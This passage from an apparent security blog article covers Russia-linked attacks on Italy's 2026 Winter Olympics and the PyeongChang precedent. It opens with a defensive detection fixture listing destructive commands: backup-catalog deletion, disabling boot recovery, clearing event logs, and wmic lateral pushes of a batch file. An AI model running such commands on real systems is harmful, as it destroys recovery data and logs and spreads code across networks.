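        ev("WS-0417", 10, "wbadmin.exe delete catalog -quiet"),
        ev("WS-0417", 11, "bcdedit.exe /set {default} recoveryenabled no"),
        ev("WS-0417", 11, "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
        ev("WS-0417", 11, "wevtutil.exe cl System"),
        ev("WS-0417", 11, "wevtutil.exe cl Security"),
        ev("ADMIN-01", 30, "psexec.exe \\\\FILE-01 -s cmd.exe /c gpupdate /force", "GAMES\\it.admin"),  # one target
    ]
    for n, target in enumerate(["WS-0418", "WS-0419", "DC-01", "WS-0420"]):
        events.append(ev("WS-0417", 12 + n,
                         f'wmic /node:"{target}" process call create "cmd.exe /c \\\\WS-0417\\share\\run.bat"'))
    return events
```

The backup server's lone `vssadmin` call and the administrator's single PsExec session fall below the thresholds by design; the workstation that disables recovery, clears its logs and then pushes a batch file to three workstations and a domain controller within five minutes is the finding. Hunting for the preamble matters because every one of those commands runs before the wipe, which is the only window in which detection still changes the outcome.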

5. International Cooperation

Major events increasingly require cybersecurity cooperation across national boundaries. Italy's coordination with diplomatic facilities abroad and likely intelligence sharing with allies demonstrates the value of:

  • Bilateral and multilateral threat intelligence sharing agreements
  • Participation in sector-specific information sharing organizations
  • Relationships with national cybersecurity agencies (CISA, NCSC, ANSSI, etc.)
  • Coordination with hosting nation's law enforcement and intelligence services

The Future of Olympic Cybersecurity

As the Olympic movement continues, the cybersecurity challenges will only intensify.

The Attribution Problem Persists

Despite eventual attribution of the PyeongChang attack to Russia, the initial confusion created by Olympic Destroyer's false flags demonstrates the persistent challenge of timely, accurate attribution. As Jason Healey, a cyberconflict researcher at Columbia University, warns: "For the folks that can't afford CrowdStrike and FireEye, for the vast bulk of nations, attribution is still an issue."

This creates particular dangers for nations where misattributed cyberattacks could trigger disproportionate responses. "If you can't imagine this with US and Russia, imagine it with India and Pakistan, or China and Taiwan, where a false flag provokes a much stronger response than even its authors intended," Healey notes.

The Public Dimension

False flags don't need to fool cybersecurity professionals to achieve their objectives—they only need to create enough public confusion to undermine collective response. As FireEye's John Hultquist observed after Olympic Destroyer: "The question is one of audience. The problem is that the US government may never say a thing, and within 24 hours, the damage is done. The public was the audience in the first place."

In an era of rapid social media dissemination and declining trust in institutions, deception operations can shape public narratives even when technical evidence points clearly toward attribution.

Escalation Risks

Sandworm's track record suggests an escalating willingness to accept collateral damage and cross previously respected boundaries:

  • Ukrainian power grid attacks demonstrated willingness to target civilian infrastructure
  • NotPetya's global spread showed disregard for massive economic consequences
  • Olympic Destroyer revealed sophisticated deception capabilities

Future attacks may combine all these elements—destructive capability, global reach, and attribution evasion—in ways that create unprecedented challenges for defenders and policymakers.

Recommendations for Organizations

While most organizations will never defend Olympic-scale events, the lessons from Italy's 2026 experience apply broadly:

For Event Organizers

  1. Begin security planning years in advance, not months
  2. Conduct geopolitical threat analysis to identify motivated adversaries
  3. Establish relationships with national cybersecurity agencies early
  4. Build redundant systems that can operate independently if primary infrastructure fails
  5. Practice incident response through realistic simulations
  6. Plan for attribution ambiguity and establish communications strategies for attack scenarios

For Critical Infrastructure Operators

  1. Study nation-state TTPs from incidents like Olympic Destroyer
  2. Implement network segmentation to prevent cascading failures
  3. Maintain offline recovery capabilities that don't depend on network infrastructure
  4. Establish threat intelligence partnerships with peer organizations
  5. Conduct regular threat hunting for sophisticated, persistent threats
  6. Prepare for false flag operations that may complicate incident response

For Policymakers

  1. Establish norms and consequences for cyberattacks on international events
  2. Improve attribution capabilities and timelines for public disclosure
  3. Support international cybersecurity cooperation frameworks
  4. Invest in defensive capabilities for organizations hosting major events
  5. Counter disinformation rapidly when false flags create public confusion

Conclusion: The Permanent Cyber Shadow Over International Events

The 2026 Winter Olympics cyberattack represents both progress and persistent challenges in defending major international events against nation-state adversaries.

Italy's apparent success in neutralizing Russian-origin attacks before they could cause operational disruption demonstrates that lessons from PyeongChang have been learned and applied. Enhanced monitoring, international cooperation, and proactive threat hunting can significantly improve defensive posture against even sophisticated adversaries.

However, the attack's occurrence underscores a troubling reality: major international events will face cyber threats as long as they carry geopolitical significance. Russia's pattern of attacking Olympics from which it has been excluded suggests a predictable but difficult-to-prevent cycle of retaliation.

The evolution from Olympic Destroyer's devastating but ultimately contained impact in 2018 to Italy's early neutralization of attacks in 2026 provides reason for cautious optimism. Defenders are learning, adapting, and improving their capabilities.

But adversaries are learning too. Sandworm and other sophisticated nation-state actors continue to develop more advanced techniques, more elaborate deceptions, and potentially more destructive capabilities.

As Sang-jin Oh, the technology director who fought to save the PyeongChang Olympics, reflected: "It still makes me furious that, without any clear purpose, someone hacked this event. It would have been a huge black mark on these games of peace. I can only hope that the international community can figure out a way that this will never happen again."

That hope remains aspirational. Until international norms with real enforcement mechanisms constrain nation-state cyber operations against civilian targets, major events will operate under a permanent cyber shadow. The best defenders can do is prepare rigorously, cooperate extensively, and respond rapidly when attacks inevitably come.

The 2026 Winter Olympics will proceed. Athletes will compete, medals will be awarded, and the world will watch. Behind the scenes, however, another competition continues—one between nation-state attackers seeking to disrupt and embarrass their geopolitical rivals, and defenders working to ensure that international events remain free from cyber warfare's long reach.

For now, Italy's defenders have won this round. But the broader conflict is far from over.


Key Takeaways

  1. Italy attributed a coordinated campaign against roughly 120 sites, including diplomatic facilities abroad and Olympic infrastructure, to actors of Russian origin; the pro-Russian group NoName057(16) claimed the DDoS attacks
  2. Italian authorities successfully neutralized the attacks before they could cause significant disruption
  3. Historical precedent from PyeongChang 2018 shows Russia's Sandworm group capable of devastating Olympic attacks with sophisticated false flags
  4. Geopolitical motivations are clear: Russia targets Olympics from which it has been excluded or sanctioned
  5. Defense requires international cooperation, early preparation, and sophisticated threat hunting capabilities
  6. Attribution challenges persist despite improved capabilities, with false flags designed to create confusion
  7. Future attacks will likely escalate, combining destructive capability, deception, and global reach

Organizations defending high-profile events must learn from these incidents to build resilient architectures, establish intelligence partnerships, and prepare for adversaries with nation-state capabilities and strong motivations to disrupt operations.

The cyber shadow over international sporting events is permanent. The question is whether defenders can stay ahead of increasingly sophisticated and motivated attackers.


Sources:

  • Reuters: "Italy foiled Russia-linked cyberattacks on embassies, Olympic sites"
  • The Record: "Italy blames Russia-linked hackers for cyberattacks ahead of Winter Olympics"
  • The Register: "'Russian origin' cyberattacks target Italy's Winter Olympics"
  • WIRED: "Inside Olympic Destroyer, the Most Deceptive Hack in History"
  • Multiple cybersecurity firms (Cisco Talos, CrowdStrike, Kaspersky, FireEye)
  • U.S. Department of Justice indictments of GRU Unit 74455

By Breached Company